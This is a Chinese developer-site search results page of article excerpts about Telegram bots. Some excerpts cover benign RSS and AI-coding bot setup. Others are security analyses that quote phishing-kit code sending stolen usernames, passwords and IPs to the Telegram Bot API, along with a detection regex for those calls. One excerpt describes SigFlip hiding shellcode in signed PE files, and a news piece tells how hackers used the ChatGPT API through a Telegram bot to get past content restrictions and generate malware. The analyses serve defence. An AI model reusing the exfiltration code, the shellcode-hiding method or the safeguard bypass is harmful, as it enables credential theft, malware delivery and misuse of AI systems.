文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

如何使用SigFlip篡改身份认证码签名的PE文件

关于SigFlip SigFlip是一款能够篡改经过身份认证码签名的PE文件(exe、dll、sys等)的工具,而且整个过程不会影响或破坏已有的身份认证码签名。...换句话来说,就是我们可以使用SigFlip向PE文件中嵌入数据(比如Shellcode),并且再不会破坏文件签名、完整性检查或PE文件功能的情况下,修改PE文件的校验和或哈希。...SigInject将保存针对PE文件的修改操作,并保证其签名和证书有效性不变。...SigLoader是一个基础加载器,它采用SigInject创建的修改后的PE文件路径和解密密钥作为参数,然后提取和解密嵌入的Shellcode,以供选择Shellcode注入使用。...)>" SigInject:向PE文件的[WIN_CERTIFICATE]证书表中注入加密的Shellcode,打印的加密密钥可以跟基础C/C#加载器结合使用以保证签名和证书的完整性: SigInject

1.4K40

一个基于Go的Telegram RSS Bot机器人,支持应用内阅读预览

说明:很久前博主介绍过一个Telegram RSS机器人→传送门,用起来还不错,就是安装对新手不太友好,这里就再介绍一个基于Go的Telegram RSS Bot,安装很快,也支持直接在Telegram...应用内预览订阅文章,很方便,也是博主用过最好用的一个Telegram RSS机器人,这里就说下使用方法。...2、申请Telegraph Token curl https://api.telegra.ph/createAccount?...100 #自定义telegram bot api url,选填 telegram: endpoint: https://xxx.com/ #使用Mysql数据库,不填则默认使用SQLite mysql.../data.db ##这里博主默认使用的SQLite,扫描间隔为5分钟,所以使用到的参数如下: bot_token: XXX telegraph_token: xxxx update_interval

2.2K00
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

    本文聚焦于2025年曝光的一类以Telegram为核心载体的高级钓鱼活动,系统剖析其如何利用Bot API、公开频道、WebView嵌入及消息自毁等原生功能,实现凭据窃取、会话劫持与恶意分发的闭环。...本文提出一套涵盖终端行为监控、身份认证加固、浏览器运行时保护与威胁情报提取的多维防御框架,并辅以可落地的代码示例,验证对异常Telegram进程通信、WebView劫持及Bot API调用的识别能力。...此类攻击的核心挑战在于其“合法性掩护”:所有通信均经由telegram.org域名完成,符合SPF/DKIM/DMARC标准;Bot API调用使用HTTPS加密;消息支持自毁与私聊加密,极大增加取证难度...更重要的是,传统安全设备难以区分正常用户使用Telegram与恶意Bot数据回传之间的流量差异。...6 结语本文系统分析了Telegram基础设施在现代钓鱼攻击中的滥用模式,阐明其如何通过Bot API、频道分发与WebView嵌入实现端到端攻击闭环。

    34410

    Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

    关键词:Telegram机器人;凭证钓鱼;Bot API;会话接管;多因素认证;行为检测1 引言随着云服务与数字身份的深度融合,凭证窃取已成为网络攻击的核心目标。...然而,自2024年起,欧洲地区出现一种以Telegram机器人为交互枢纽的新型钓鱼模式,显著提升了攻击效率与隐蔽性。...本文聚焦该攻击范式,旨在回答三个问题:(1)Telegram机器人如何嵌入钓鱼攻击链并提升其交互性?(2)其技术实现是否存在可检测的行为特征?(3)组织应如何调整现有安全策略以阻断此类人机协同攻击?...整个过程在5分钟内完成,且因使用真实品牌界面与即时交互,成功率显著高于传统钓鱼。4 技术检测与防御方案4.1 封禁Telegram关联基础设施安全网关应识别并阻断与已知恶意Bot关联的通信。...4.2 多因素认证加固鉴于攻击者可绕过短信/推送式MFA,建议强制使用FIDO2硬件安全密钥或基于证书的认证。

    26010

    部署你的RSS机器人

    telegram bot api url)(可忽略) allowed_users(允许使用 bot 的用户 telegram id)(可忽略(为空时所有用户都能使用 bot)) 申请 Telegram...格式的文本,其中的 access_token 字段值即为 Telegraph Token,请妥善保存 curl https://api.telegra.ph/createAccount?...author_url 请替换成自己的 查看 Telegram ID | 默认的配置是允许所有用户使用我们刚刚创建的 Telegram RSS Bot,但为了安全、防止被滥用我们可以设置指定 ID 的...Telegram 用户能够使用该 Bot,获取允许使用用户(比如自己)的 Telegram ID 并填入配置文件的 allowed_users 字段 获取 Telegram ID:https://t.me...start=botostore 使用 将 Bot 添加到您的频道中,并设置为管理员,Bot 的管理命令如下: /sub @ChannelID [url] 订阅 /unsub @ChannelID [url

    1.4K20

    我用 Opencode 做了一个 FakeClawBot

    Web 页面、手机 App、Discord Bot、Telegram Bot……只要能发 HTTP 请求,就能用上 AI 编程的全部能力。...↓ 发消息 Telegram Bot API ↓ 转发 bot.py (Python) ↓ 调用 HTTP API OpenCode Server (:4096) ↓...用户在 Telegram 里发一句话,bot.py 接住消息,转手通过 HTTP 丢给本地跑着的 OpenCode Server,Server 调度你选好的大模型去干活(读代码、改文件、跑测试),最后把结果返回给...整个项目只有 2 个核心文件: 文件 作用 代码量 bot.py Telegram Bot 主逻辑 ~660 行 opencode_client.py OpenCode HTTP API 客户端 ~220...OpenCode Server(你的电脑得开着) Telegram 单条消息 4096 字符限制,超长回复需要分块(我已经写好解决方案了) 不能直接传文件给 Bot(未来可以加) GitHub 地址:

    32610

    使用n8n搭建服务器监控系统:从Webhook到Telegram告警的完整实现

    本文介绍如何使用n8n工作流自动化工具搭建一个完整的服务器监控系统,实现从数据采集、告警判断到Telegram消息推送的全流程自动化,整个方案无需编写复杂代码,配置完成后可实现7x24小时实时监控。...Bot(用于接收告警消息)支持HTTPS的域名(用于Webhook接收)配置信息获取:n8n域名:替换your-n8n-domain.com为你的n8n实际部署域名认证Token:使用openssl...rand -hex 32命令生成强随机字符串Telegram Chat ID:与Bot对话后访问 https://api.telegram.org/botBOT_TOKEN>/getUpdates...发送告警到Telegram当检测到告警时,通过Telegram Bot发送通知消息:执行以下命令进行安装/配置:从配置可以看到,Telegram节点的关键设置:Resource: MessageOperation...测试验证配置完成后,使用curl命令测试整个流程:执行以下命令进行安装/配置:测试命令示例:curl -X POST https://your-n8n-domain.com/webhook/server-monitor

    2.2K100

    钓鱼团伙用Telegram机器人“接单”:欧洲凭证窃取进入“实时客服”时代

    据网络安全媒体《Security Chronicle World》(SC World)2025年12月发布的简报,一种以 Telegram Bot 为指挥中枢 的新型钓鱼模式正在欧洲快速蔓延。..."时间: " . date('Y-m-d H:i:s');// 调用Telegram API发送消息file_get_contents("https://api.telegram.org/bot{$bot_token...开放API成双刃剑Telegram之所以成为钓鱼团伙的首选平台,源于其三大特性:Bot API完全开放且文档完善:开发者可轻松创建具备消息推送、按钮交互、文件传输能力的机器人;端到端加密非默认启用:普通群组和频道通信未加密...事后分析发现,攻击者使用的Telegram机器人名为 @CloudGrabber_Bot,其频道中同时监控着来自12个国家的 87个活跃钓鱼站点,平均每15分钟就有一次新凭证捕获。...网络层:封禁高风险Telegram基础设施在防火墙或代理中,基于威胁情报封禁已知与钓鱼相关的Telegram Bot Token、Channel ID对应的IP段;使用DNS过滤服务(如Cisco Umbrella

    18310

    Telegram小程序钓鱼攻击机制与防御策略研究

    关键词:Telegram;Mini Apps;网络钓鱼;数字资产;钱包劫持;安全防护(1) 引言Telegram自2013年上线以来,凭借端到端加密(Secret Chat)、跨平台同步及开放API等特性...Mini App的启动流程如下:用户点击消息中的“Launch”按钮或Bot菜单项;Telegram客户端加载开发者预设的HTTPS URL;页面通过window.Telegram.WebApp对象与宿主环境通信...然而,这些限制存在明显漏洞:首先,initData虽经Telegram签名,但仅用于身份声明,不包含强认证凭证。...关键伪造点包括:使用与官方Bot相似的用户名(如@portal_market vs @portals);在Mini App信息页中填写虚假的“官方频道”链接;模拟Telegram原生加载动画,增强可信度...(5.3) 平台治理建议Telegram应改进Mini Apps审核机制:实施域名备案制:要求开发者使用已验证的企业域名;引入应用签名:对Mini App前端资源进行哈希校验,防止运行时篡改;建立快速举报通道

    31210

    钓鱼攻击之后,你的密码去了哪里?——一场横跨暗网、Telegram与企业内网的数据黑市追踪

    取而代之的,是基于即时通讯工具的实时数据回传机制。其中,Telegram因其开放的Bot API、端到端加密(可选)、以及极低的运营门槛,成为当前最主流的“数据接收器”。...研究人员在2025年12月捕获的一个仿冒招商银行的钓鱼页面中,发现了如下代码片段:// 钓鱼表单提交后执行fetch('https://api.telegram.org/bot/sendMessage...和——它们指向攻击者预先创建的Telegram Bot。...更危险的是,部分攻击者会利用被盗SaaS账户(如Office 365、Google Workspace)申请新的API令牌,绕过多因素认证(MFA),实现持久化访问。...对个人用户,专家建议:绝不复用密码:使用密码管理器生成并存储唯一强密码;强制启用MFA:优先选择FIDO2安全密钥(如YubiKey)或认证器App,避免短信验证码;定期检查泄露记录:通过Have I

    17010

    Telegram Bot – 在线获取群聊GroupChat ID 教程

    假设机器人名称是my_bot。 1-将机器人添加到组中。 转到组,单击组名称,单击添加成员,在搜索框中搜索您的机器人,如下所示:@my_bot,选择您的机器人并单击添加。 2-向机器人发送虚拟消息。...您可以使用此示例:/my_id @my_bot 我尝试了一些消息,但并非所有消息都有效。上面的示例工作正常。...也许消息应该以 / 开头) 3- 转到以下网址: https://api.telegram.org/botXXX:YYYY/getUpdates 将 XXX:YYYY 替换为您的机器人令牌,如: https...://api.telegram.org/bot123456789:jbd78sadvbdy63d37gda37bd8/getUpdates 4- 查找 "chat":{"id":-zzzzzzzzzz,...5-测试:您可以测试使用 curl 向群组发送消息: curl -X POST "https://api.telegram.org/botXXX:YYYY/sendMessage" -d "chat_id

    36.8K30

    面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

    文中提供可部署的自动化检测脚本示例,包括相似域名生成与监控、邮件URL跳转链解析、Telegram Bot通信特征提取等关键技术实现。...关键词:定向钓鱼;网络托管;社会工程;品牌仿冒;多因素认证;域名安全;Telegram Bot;SSL证书滥用1 引言网络托管服务作为现代数字基础设施的核心组成部分,承载着数百万中小企业、政府机构及个人网站的运行...传统基于签名或黑名单的反钓鱼机制难以应对动态生成的仿冒站点。因此,亟需从攻击链视角出发,解构其运作逻辑,并提出可落地的防御对策。...3.3 数据外泄路径典型数据流如下:Victim → Fake Login Page → PHP Collector Script → Telegram Bot (via API) → Attacker...(creds):url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"payload = {"chat_id": CHAT_ID,"text

    21210

    黑客靠ChatGPT赚钱:每100次收费37元,还能修改恶意软件代码

    “机器人即服务” 据相关安全公司消息,黑客们首先找到一种可以绕过OpenAI限制的方法,通过使用ChatGPT API集成到他们的一个应用程序中。...事实上证明,相较于网页端,API版本反而不会对恶意内容进行强制限制。 其中有个论坛的用户,就将其与Telegram消息APP结合起来,以此来出售服务Telegram bot。...△Telegram bot生成的钓鱼软件,图源:Enlarge △Telegram bot生成的恶意软件,图源:Enlarge(下同) 与此同时,其他黑客也在发布一些可以免费生成恶意内容的代码。...一种是Web用户界面,一种是API,将OpenAI的模型和数据跟你自己的应用界面配套使用。 比如这些都是合法认证的APP。 此前,黑客们使用Web端ChatGPT生成恶意软件和钓鱼邮件很容易。...但随着ChatGPT的监管不断加强。OpenAI的CTO也在最近的采访中提及了监管的重要性。 黑客们逐渐开始转战去使用他们的API,结果限制要少得多。

    89020

    面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

    正因如此,Aruba成为钓鱼攻击的优先目标。2.3 现有防御机制的不足传统邮件网关(SEG)依赖签名匹配与URL黑名单,难以应对动态生成的钓鱼页面。...更关键的是,Telegram Bot作为数据回传通道,具有高隐蔽性与实时性:// telegram.phpfunction send_to_telegram($user, $pass, $ip) {$bot_token...\nUser: $user\nPass: $pass\nIP: $ip";$url = "https://api.telegram.org/bot$bot_token/sendMessage?...API调用if re.search(r'api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/sendMessage', packet.payload):if not whitelist.contains...企业亦应实施最小权限原则,限制Aruba账户的API访问范围。六、结语本文通过对一款针对意大利Aruba用户的钓鱼工具包进行逆向分析,揭示了其前端仿冒、地理过滤、Telegram外传等关键技术特征。

    22310

    跨国钓鱼攻击的技术特征与执法协作机制研究——以罗马尼亚破获HMRC诈骗案为例

    后端采用轻量级PHP脚本接收表单提交,并将窃取的数据通过Base64编码后POST至隐藏的Telegram Bot或通过Tor网络转发至C2服务器。关键后端处理逻辑如下(简化版):api.telegram.org/bot{$...bot_token}/sendMessage";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POST...HMRC通过其内部威胁情报平台识别出异常登录模式(如同一IP短时间内尝试多个NIN验证),并将可疑域名、IP地址及Telegram Bot ID提交至Europol的EC3(欧洲网络犯罪中心)。...(一)邮件层:增强认证与内容分析建议所有政府机构强制实施DMARC策略(p=reject),并部署基于机器学习的邮件内容分析模型。

    34610

    钓鱼攻击中窃取数据的流转路径与防御机制研究

    关键词:钓鱼攻击;凭证泄露;数据流转;暗网市场;多因素认证;异常登录检测1 引言钓鱼攻击自21世纪初成为主流社会工程手段以来,其技术形态与商业模式持续演化。...因此,本文旨在回答以下核心问题:(1)钓鱼窃取的数据如何被传输、存储与分类?(2)地下市场如何对不同类型凭证进行估值与交易?(3)攻击者如何利用这些数据实施二次乃至多次攻击?...因此,2020年后,此类方式使用率显著下降。2.2 Telegram Bot 成为主流回传通道当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。...攻击者首先在Telegram上创建Bot并获取token,随后在钓鱼脚本中调用Telegram的sendMessage接口。...对于电商账户,可能直接下单高价值商品;对于云存储,则下载敏感文件用于勒索。

    18410

    喂饭教程:快速在你的服务器搭建Moltbot!

    接下来,我们将详细介绍如何在服务器上快速搭建属于你的 Moltbot 实例,并提供一个可直接使用的 Telegram 示例配置,帮助你在隔离环境中完成部署、连接与验证,快速体验 Moltbot 的完整能力...Telegram回复机器人打开 Telegram,在聊天列表页面下拉搜索 @BotFather,并进入官方 Bot 管理对话。...○ 用户名必须以 bot 结尾○ 且不能与现有机器人重复创建完成后,BotFather 会向你发送机器人的 访问链接 和 Bot API Token。...请妥善保存该 Token,它将用于 Moltbot 与 Telegram 的连接,格式类似:5.打开 Moltbot 的配置界面,选择 Telegram(Bot API) 作为消息通道,并将上一步获得的...8.进行文件传输等功能测试,确认消息与文件均可正常收发,说明机器人已配置完成并运行正常。至此,Moltbot 已完成部署并成功接入 Telegram。

    1.6K100
    点击加载更多

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

      领券